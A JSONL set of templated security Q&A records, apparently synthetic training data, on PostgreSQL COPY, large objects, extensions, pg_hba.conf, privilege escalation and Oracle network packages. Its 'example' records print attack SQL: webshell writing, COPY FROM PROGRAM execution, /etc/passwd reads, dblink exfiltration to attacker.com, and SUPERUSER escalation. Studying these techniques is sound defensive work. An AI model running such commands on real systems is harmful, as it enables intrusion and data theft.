+{"id": "trtp-1a3933ee5d10", "instruction": "What do security professionals need to know about PostgreSQL COPY Command Exploitation?", "output": "PostgreSQL's COPY command transfers data between files and tables. With superuser privileges, COPY TO/FROM can read and write arbitrary files on the server, enabling data exfiltration and backdoor creation.\n\nSecurity Relevance: COPY TO PROGRAM provides direct command execution in PostgreSQL 9.3+. Even without PROGRAM, COPY enables file operations. Combined with SQL injection, this leads to server compromise.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-copy-command-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.142903Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.142932Z", "updated_at": "2025-12-17T19:35:42.142932Z"}
+{"id": "trtp-272386bc6ae0", "instruction": "Describe the technical aspects of PostgreSQL COPY Command Exploitation.", "output": "PostgreSQL COPY Command Exploitation consists of the following key components:\n\n- COPY TO for file writing\n- COPY FROM for file reading\n- COPY PROGRAM for command execution\n- pg_read_file alternative\n- File permission requirements", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-copy-command-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.142903Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.142953Z", "updated_at": "2025-12-17T19:35:42.142953Z"}
+{"id": "trtp-e83e40697d61", "instruction": "From a security perspective, why should defenders understand PostgreSQL COPY Command Exploitation?", "output": "COPY TO PROGRAM provides direct command execution in PostgreSQL 9.3+. Even without PROGRAM, COPY enables file operations. Combined with SQL injection, this leads to server compromise.\n\nCommon attack vectors include:\n- COPY PROGRAM for command execution\n- Webshell writing to web directories\n- Configuration file reading\n- SSH key injection to .ssh/authorized_keys", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-copy-command-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.142903Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.142968Z", "updated_at": "2025-12-17T19:35:42.142968Z"}
+{"id": "trtp-dfc6b4db689a", "instruction": "How can adversaries exploit PostgreSQL COPY Command Exploitation?", "output": "Attack techniques involving PostgreSQL COPY Command Exploitation:\n\n- COPY PROGRAM for command execution\n- Webshell writing to web directories\n- Configuration file reading\n- SSH key injection to .ssh/authorized_keys\n\nDefenders can detect these attacks by:\n- COPY TO/FROM file operations\n- COPY PROGRAM usage\n- Superuser query execution", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-copy-command-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.142903Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.142993Z", "updated_at": "2025-12-17T19:35:42.142993Z"}
+{"id": "trtp-3a8f4539fa6e", "instruction": "What log entries indicate PostgreSQL COPY Command Exploitation attacks?", "output": "Methods for detecting PostgreSQL COPY Command Exploitation attacks or anomalies:\n\n- COPY TO/FROM file operations\n- COPY PROGRAM usage\n- Superuser query execution\n- Unusual file access patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-copy-command-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.142903Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.143012Z", "updated_at": "2025-12-17T19:35:42.143012Z"}
+{"id": "trtp-9d6843d7e2a3", "instruction": "What security controls mitigate PostgreSQL COPY Command Exploitation risks?", "output": "Security controls and preventive measures for PostgreSQL COPY Command Exploitation:\n\n- Restrict superuser access\n- Don't grant COPY privileges to application users\n- Monitor for COPY PROGRAM usage\n- Filesystem permissions limiting postgres user\n\nCOPY TO PROGRAM provides direct command execution in PostgreSQL 9.3+. Even without PROGRAM, COPY enables file operations. Combined with SQL injection, this leads to server compromise.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-copy-command-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.142903Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.143025Z", "updated_at": "2025-12-17T19:35:42.143025Z"}
+{"id": "trtp-f8584b1fa6e8", "instruction": "Show an example of PostgreSQL COPY Command Exploitation.", "output": "Example of PostgreSQL COPY Command Exploitation:\n\n```sql\n-- Write file:\nCOPY (SELECT '<?php system($_GET[\"c\"]); ?>') TO '/var/www/html/shell.php';\n\n-- Execute command (9.3+):\nCOPY cmd FROM PROGRAM 'whoami';\n\n-- Read file:\nCREATE TABLE etc_passwd(content TEXT);\nCOPY etc_passwd FROM '/etc/passwd';\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-copy-command-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.142903Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.143035Z", "updated_at": "2025-12-17T19:35:42.143035Z"}
+{"id": "trtp-d1216cb8cb6e", "instruction": "What is PostgreSQL Large Objects and why is it important for database security?", "output": "PostgreSQL large objects (lo) store binary data in chunks. They can be used to read and write files, providing an alternative to COPY for file operations. Large object functions enable byte-level file manipulation.\n\nSecurity Relevance: Large objects provide file access without COPY. Attackers can import files for reading or export data to write files. This technique works even when COPY is restricted.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-large-objects", "license": "original", "retrieved_at": "2025-12-17T19:35:42.145394Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.145425Z", "updated_at": "2025-12-17T19:35:42.145425Z"}
+{"id": "trtp-a6023b7b3141", "instruction": "What are the key components of PostgreSQL Large Objects?", "output": "PostgreSQL Large Objects consists of the following key components:\n\n- lo_import/lo_export functions\n- lo_create/lo_open/lo_close\n- pg_largeobject catalog\n- File I/O through large objects\n- OID references", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-large-objects", "license": "original", "retrieved_at": "2025-12-17T19:35:42.145394Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.145449Z", "updated_at": "2025-12-17T19:35:42.145449Z"}
+{"id": "trtp-806f1dcd097b", "instruction": "From a security perspective, why should defenders understand PostgreSQL Large Objects?", "output": "Large objects provide file access without COPY. Attackers can import files for reading or export data to write files. This technique works even when COPY is restricted.\n\nCommon attack vectors include:\n- File reading via lo_import\n- File writing via lo_export\n- Binary file manipulation\n- Bypassing COPY restrictions", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-large-objects", "license": "original", "retrieved_at": "2025-12-17T19:35:42.145394Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.145463Z", "updated_at": "2025-12-17T19:35:42.145463Z"}
+{"id": "trtp-1f5dacba5b5a", "instruction": "What are common attack techniques involving PostgreSQL Large Objects?", "output": "Attack techniques involving PostgreSQL Large Objects:\n\n- File reading via lo_import\n- File writing via lo_export\n- Binary file manipulation\n- Bypassing COPY restrictions\n\nDefenders can detect these attacks by:\n- Large object function calls\n- Unusual pg_largeobject access\n- lo_export to unexpected paths", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-large-objects", "license": "original", "retrieved_at": "2025-12-17T19:35:42.145394Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.145496Z", "updated_at": "2025-12-17T19:35:42.145496Z"}
+{"id": "trtp-7a45071c3445", "instruction": "What log entries indicate PostgreSQL Large Objects attacks?", "output": "Methods for detecting PostgreSQL Large Objects attacks or anomalies:\n\n- Large object function calls\n- Unusual pg_largeobject access\n- lo_export to unexpected paths\n- Large object creation patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-large-objects", "license": "original", "retrieved_at": "2025-12-17T19:35:42.145394Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.145508Z", "updated_at": "2025-12-17T19:35:42.145508Z"}
+{"id": "trtp-4084d8544d5f", "instruction": "What security controls mitigate PostgreSQL Large Objects risks?", "output": "Security controls and preventive measures for PostgreSQL Large Objects:\n\n- Restrict large object functions\n- Monitor pg_largeobject catalog access\n- Limit superuser access\n- Audit file operation functions\n\nLarge objects provide file access without COPY. Attackers can import files for reading or export data to write files. This technique works even when COPY is restricted.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-large-objects", "license": "original", "retrieved_at": "2025-12-17T19:35:42.145394Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.145521Z", "updated_at": "2025-12-17T19:35:42.145521Z"}
+{"id": "trtp-13514e409607", "instruction": "Provide a code example for PostgreSQL Large Objects.", "output": "Example of PostgreSQL Large Objects:\n\n```sql\n-- Read file via large object:\nSELECT lo_import('/etc/passwd');\nSELECT * FROM pg_largeobject WHERE loid = <returned_oid>;\n\n-- Write file:\nSELECT lo_from_bytea(0, 'malicious content');\nSELECT lo_export(<oid>, '/tmp/output.txt');\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-large-objects", "license": "original", "retrieved_at": "2025-12-17T19:35:42.145394Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.145531Z", "updated_at": "2025-12-17T19:35:42.145531Z"}
+{"id": "trtp-c4ca12f4a500", "instruction": "Describe PostgreSQL Extension Exploitation and its role in database security.", "output": "PostgreSQL extensions add functionality through shared libraries. Malicious extensions can execute arbitrary code. Even legitimate extensions may have security implications that attackers exploit.\n\nSecurity Relevance: Extensions run with database server privileges. Malicious extensions provide persistent code execution. Some built-in extensions like dblink enable network operations that can be abused.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-extension-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.147734Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.147764Z", "updated_at": "2025-12-17T19:35:42.147764Z"}
+{"id": "trtp-05cd6ae0bc53", "instruction": "Describe the technical aspects of PostgreSQL Extension Exploitation.", "output": "PostgreSQL Extension Exploitation consists of the following key components:\n\n- CREATE EXTENSION command\n- Extension shared libraries\n- adminpack extension\n- dblink extension\n- pg_stat_statements", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-extension-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.147734Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.147784Z", "updated_at": "2025-12-17T19:35:42.147784Z"}
+{"id": "trtp-22d25cec4e30", "instruction": "From a security perspective, why should defenders understand PostgreSQL Extension Exploitation?", "output": "Extensions run with database server privileges. Malicious extensions provide persistent code execution. Some built-in extensions like dblink enable network operations that can be abused.\n\nCommon attack vectors include:\n- dblink for OOB data exfiltration\n- adminpack for file operations\n- Custom extension code execution\n- Extension privilege escalation", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-extension-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.147734Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.147817Z", "updated_at": "2025-12-17T19:35:42.147817Z"}
+{"id": "trtp-6ccc97a244a2", "instruction": "How do attackers abuse PostgreSQL Extension Exploitation?", "output": "Attack techniques involving PostgreSQL Extension Exploitation:\n\n- dblink for OOB data exfiltration\n- adminpack for file operations\n- Custom extension code execution\n- Extension privilege escalation\n\nDefenders can detect these attacks by:\n- CREATE EXTENSION events\n- dblink connections to external hosts\n- Unknown extension loading", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-extension-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.147734Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.147832Z", "updated_at": "2025-12-17T19:35:42.147832Z"}
+{"id": "trtp-099b00be401d", "instruction": "What log entries indicate PostgreSQL Extension Exploitation attacks?", "output": "Methods for detecting PostgreSQL Extension Exploitation attacks or anomalies:\n\n- CREATE EXTENSION events\n- dblink connections to external hosts\n- Unknown extension loading\n- Extension-related function calls", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-extension-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.147734Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.147843Z", "updated_at": "2025-12-17T19:35:42.147843Z"}
+{"id": "trtp-5e068e588372", "instruction": "What are best practices for preventing PostgreSQL Extension Exploitation?", "output": "Security controls and preventive measures for PostgreSQL Extension Exploitation:\n\n- Restrict CREATE EXTENSION privilege\n- Audit enabled extensions\n- Monitor external connections from dblink\n- Remove unnecessary extensions\n\nExtensions run with database server privileges. Malicious extensions provide persistent code execution. Some built-in extensions like dblink enable network operations that can be abused.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-extension-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.147734Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.147855Z", "updated_at": "2025-12-17T19:35:42.147855Z"}
+{"id": "trtp-d5e0a12e1666", "instruction": "What is the syntax for PostgreSQL Extension Exploitation?", "output": "Example of PostgreSQL Extension Exploitation:\n\n```sql\n-- Enable dblink for network access:\nCREATE EXTENSION dblink;\n\n-- Use dblink for out-of-band data exfiltration:\nSELECT * FROM dblink('host=attacker.com user=x password=x', 'SELECT version()') AS t(v TEXT);\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-extension-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.147734Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.147865Z", "updated_at": "2025-12-17T19:35:42.147865Z"}
+{"id": "trtp-21273c8f043e", "instruction": "Explain PostgreSQL pg_hba.conf Security from a security perspective.", "output": "pg_hba.conf (host-based authentication) controls client authentication in PostgreSQL. Misconfigurations can allow unauthorized access, while proper configuration is essential for database security.\n\nSecurity Relevance: pg_hba.conf misconfigurations are common. 'trust' authentication allows passwordless access. Overly broad address rules enable unauthorized connections. First-match ordering can bypass intended restrictions.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-pg_hba.conf-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.150089Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.150119Z", "updated_at": "2025-12-17T19:35:42.150119Z"}
+{"id": "trtp-fb4da6f15b50", "instruction": "What are the key components of PostgreSQL pg_hba.conf Security?", "output": "PostgreSQL pg_hba.conf Security consists of the following key components:\n\n- Connection type (local, host, hostssl)\n- Database and user matching\n- Address/CIDR specifications\n- Authentication methods (md5, scram, trust)\n- Rule ordering", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-pg_hba.conf-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.150089Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.150153Z", "updated_at": "2025-12-17T19:35:42.150153Z"}
+{"id": "trtp-7506ac35f259", "instruction": "From a security perspective, why should defenders understand PostgreSQL pg_hba.conf Security?", "output": "pg_hba.conf misconfigurations are common. 'trust' authentication allows passwordless access. Overly broad address rules enable unauthorized connections. First-match ordering can bypass intended restrictions.\n\nCommon attack vectors include:\n- Exploiting trust authentication rules\n- Bypassing through overly broad rules\n- Rule order manipulation\n- MD5 password hash interception", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-pg_hba.conf-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.150089Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.150168Z", "updated_at": "2025-12-17T19:35:42.150168Z"}
+{"id": "trtp-ce1799c95ec3", "instruction": "What threats are associated with PostgreSQL pg_hba.conf Security?", "output": "Attack techniques involving PostgreSQL pg_hba.conf Security:\n\n- Exploiting trust authentication rules\n- Bypassing through overly broad rules\n- Rule order manipulation\n- MD5 password hash interception\n\nDefenders can detect these attacks by:\n- pg_hba.conf file monitoring\n- Authentication method audit\n- Connection source analysis", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-pg_hba.conf-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.150089Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.150182Z", "updated_at": "2025-12-17T19:35:42.150182Z"}
+{"id": "trtp-287b780ab89b", "instruction": "How do you detect exploitation of PostgreSQL pg_hba.conf Security?", "output": "Methods for detecting PostgreSQL pg_hba.conf Security attacks or anomalies:\n\n- pg_hba.conf file monitoring\n- Authentication method audit\n- Connection source analysis\n- Failed authentication attempts", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-pg_hba.conf-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.150089Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.150194Z", "updated_at": "2025-12-17T19:35:42.150194Z"}
+{"id": "trtp-3926d1471f9a", "instruction": "What are best practices for preventing PostgreSQL pg_hba.conf Security?", "output": "Security controls and preventive measures for PostgreSQL pg_hba.conf Security:\n\n- Never use 'trust' in production\n- Use scram-sha-256 over md5\n- Limit connection sources to required IPs\n- Review pg_hba.conf regularly\n\npg_hba.conf misconfigurations are common. 'trust' authentication allows passwordless access. Overly broad address rules enable unauthorized connections. First-match ordering can bypass intended restrictions.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-pg_hba.conf-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.150089Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.150228Z", "updated_at": "2025-12-17T19:35:42.150228Z"}
+{"id": "trtp-0fd9b05ad51f", "instruction": "Show an example of PostgreSQL pg_hba.conf Security.", "output": "Example of PostgreSQL pg_hba.conf Security:\n\n```sql\n# Dangerous: trust from any host\nhost all all 0.0.0.0/0 trust\n\n# Secure: require scram-sha-256 authentication\nhost all all 192.168.1.0/24 scram-sha-256\nhost all all ::1/128 scram-sha-256\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-pg_hba.conf-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.150089Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.150238Z", "updated_at": "2025-12-17T19:35:42.150238Z"}
+{"id": "trtp-4a7b93e1a29f", "instruction": "Explain PostgreSQL Privilege Escalation from a security perspective.", "output": "PostgreSQL privilege escalation exploits trust relationships, function security contexts, or role memberships to gain higher privileges. Security definer functions and role inheritance are common escalation vectors.\n\nSecurity Relevance: SECURITY DEFINER functions execute with owner's privileges. Improperly written functions can be exploited to escalate. Role membership graphs can provide unexpected privilege paths.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-privilege-escalation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.152395Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.152423Z", "updated_at": "2025-12-17T19:35:42.152423Z"}
+{"id": "trtp-bb24c98af180", "instruction": "What elements make up PostgreSQL Privilege Escalation?", "output": "PostgreSQL Privilege Escalation consists of the following key components:\n\n- SECURITY DEFINER functions\n- Role inheritance\n- superuser role\n- DEFAULT PRIVILEGES\n- Function ownership", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-privilege-escalation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.152395Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.152446Z", "updated_at": "2025-12-17T19:35:42.152446Z"}
+{"id": "trtp-2a05aca02634", "instruction": "Why is PostgreSQL Privilege Escalation important for database security?", "output": "SECURITY DEFINER functions execute with owner's privileges. Improperly written functions can be exploited to escalate. Role membership graphs can provide unexpected privilege paths.\n\nCommon attack vectors include:\n- Exploit SECURITY DEFINER functions\n- Role membership chain exploitation\n- DEFAULT PRIVILEGES abuse\n- Function injection", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-privilege-escalation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.152395Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.152461Z", "updated_at": "2025-12-17T19:35:42.152461Z"}
+{"id": "trtp-7d68122238cc", "instruction": "How can adversaries exploit PostgreSQL Privilege Escalation?", "output": "Attack techniques involving PostgreSQL Privilege Escalation:\n\n- Exploit SECURITY DEFINER functions\n- Role membership chain exploitation\n- DEFAULT PRIVILEGES abuse\n- Function injection\n\nDefenders can detect these attacks by:\n- SECURITY DEFINER function auditing\n- Role membership changes\n- Privilege escalation attempts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-privilege-escalation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.152395Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.152499Z", "updated_at": "2025-12-17T19:35:42.152499Z"}
+{"id": "trtp-b89b1299ed94", "instruction": "What log entries indicate PostgreSQL Privilege Escalation attacks?", "output": "Methods for detecting PostgreSQL Privilege Escalation attacks or anomalies:\n\n- SECURITY DEFINER function auditing\n- Role membership changes\n- Privilege escalation attempts\n- Function execution patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-privilege-escalation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.152395Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.152511Z", "updated_at": "2025-12-17T19:35:42.152511Z"}
+{"id": "trtp-0fc42e8058c3", "instruction": "What are best practices for preventing PostgreSQL Privilege Escalation?", "output": "Security controls and preventive measures for PostgreSQL Privilege Escalation:\n\n- Audit SECURITY DEFINER functions\n- Minimize role membership\n- Use SECURITY INVOKER where possible\n- Input validation in elevated functions\n\nSECURITY DEFINER functions execute with owner's privileges. Improperly written functions can be exploited to escalate. Role membership graphs can provide unexpected privilege paths.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-privilege-escalation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.152395Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.152523Z", "updated_at": "2025-12-17T19:35:42.152523Z"}
+{"id": "trtp-0a631d05069a", "instruction": "What is the syntax for PostgreSQL Privilege Escalation?", "output": "Example of PostgreSQL Privilege Escalation:\n\n```sql\n-- Vulnerable SECURITY DEFINER function:\nCREATE OR REPLACE FUNCTION admin_query(query TEXT)\nRETURNS VOID AS $$\nBEGIN\n    EXECUTE query;  -- Executes with function owner's privileges\nEND;\n$$ LANGUAGE plpgsql SECURITY DEFINER;\n\n-- Exploitation:\nSELECT admin_query('ALTER USER attacker WITH SUPERUSER');\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-privilege-escalation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.152395Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.152548Z", "updated_at": "2025-12-17T19:35:42.152548Z"}
+{"id": "trtp-0b65e71cd484", "instruction": "Describe Oracle UTL_HTTP and Network Packages and its role in database security.", "output": "Oracle's UTL_HTTP, UTL_TCP, and related packages enable network operations from the database. Attackers use these for out-of-band data exfiltration, SSRF attacks, and establishing reverse connections.\n\nSecurity Relevance: Network packages enable database-initiated connections. Combined with SQL injection, attackers can exfiltrate data via HTTP, send SMTP messages, or establish command channels. ACLs are often misconfigured.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_http-and-network-packages", "license": "original", "retrieved_at": "2025-12-17T19:35:42.154693Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.154728Z", "updated_at": "2025-12-17T19:35:42.154728Z"}
+{"id": "trtp-9842ec86cb22", "instruction": "What elements make up Oracle UTL_HTTP and Network Packages?", "output": "Oracle UTL_HTTP and Network Packages consists of the following key components:\n\n- UTL_HTTP for HTTP requests\n- UTL_TCP for raw TCP connections\n- UTL_SMTP for email sending\n- HTTPURITYPE for URL access\n- Access Control Lists (ACL)", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_http-and-network-packages", "license": "original", "retrieved_at": "2025-12-17T19:35:42.154693Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.154748Z", "updated_at": "2025-12-17T19:35:42.154748Z"}
